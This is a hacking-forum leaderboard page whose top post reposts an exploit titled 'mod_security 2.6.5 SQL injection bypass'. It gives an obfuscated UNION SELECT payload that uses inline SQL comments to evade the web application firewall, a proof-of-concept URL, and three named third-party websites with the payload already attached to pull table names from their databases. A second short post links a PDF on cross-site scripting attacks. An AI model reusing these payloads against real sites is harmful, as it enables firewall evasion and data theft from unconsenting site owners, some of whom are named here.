Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 05/05/12 in all areas

  1. DarkyAngel
    ----------------------------------------------------------------- # Exploit Title: mod_security 2.6.5 SQL injection bypass # Date: 21/04/2012 # Author: Phizo # Greetz: Inj3ct0r Exploit DataBase 1337day.com # Software Link: http://www.modsecurity.org/ # Version: 2.6.5 # Tested on: Windows 7 & Ubuntu 10.04 ---------------------------------------------------------------- /** Although I am using union-based injection the concept of the bypass is the same **/ [+] Bypass: +/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] PoC: http://victim/page.php?id=12+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# [+] Example sites: -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://www.indiacctv.com/product.php?id=-18+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,0x5068697a6f,/*!/**/cOnCaT/**/*/(/*!table_name*/),6,7,8,9,10+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.outside-music.com/news.php?id=-1+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,2,3,4,0x5068697a6f,(/*!table_name*/),7,8,9,10,11,12,13+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/# http://www.atitelemetry.com/viewapp.php?id=7'+/*!/**/uNiOn/**/*/+/**/+/**/+/*!/**/seLeCt/**/*/+1,0x5068697a6f,/*!table_name*/,4,5,6,7+/**/FROM/**/+/*!/**/information_schema/**/*//*!.+tables*/--+ -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- # 1337day.com [2012-04-22] mod_security 2.6.5 for Apache 2.2.x & 2.4.1 Released SQL injection bypass | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
    1 point
  2. hackerika
    Sper ca am postat unde trebuie. http://securityoverride.org/downloads/cross_site_scripting_attacks_xss_exploits_and_defense_tqw__darksiderg.pdf
    -1 points
×
×
  • Create New...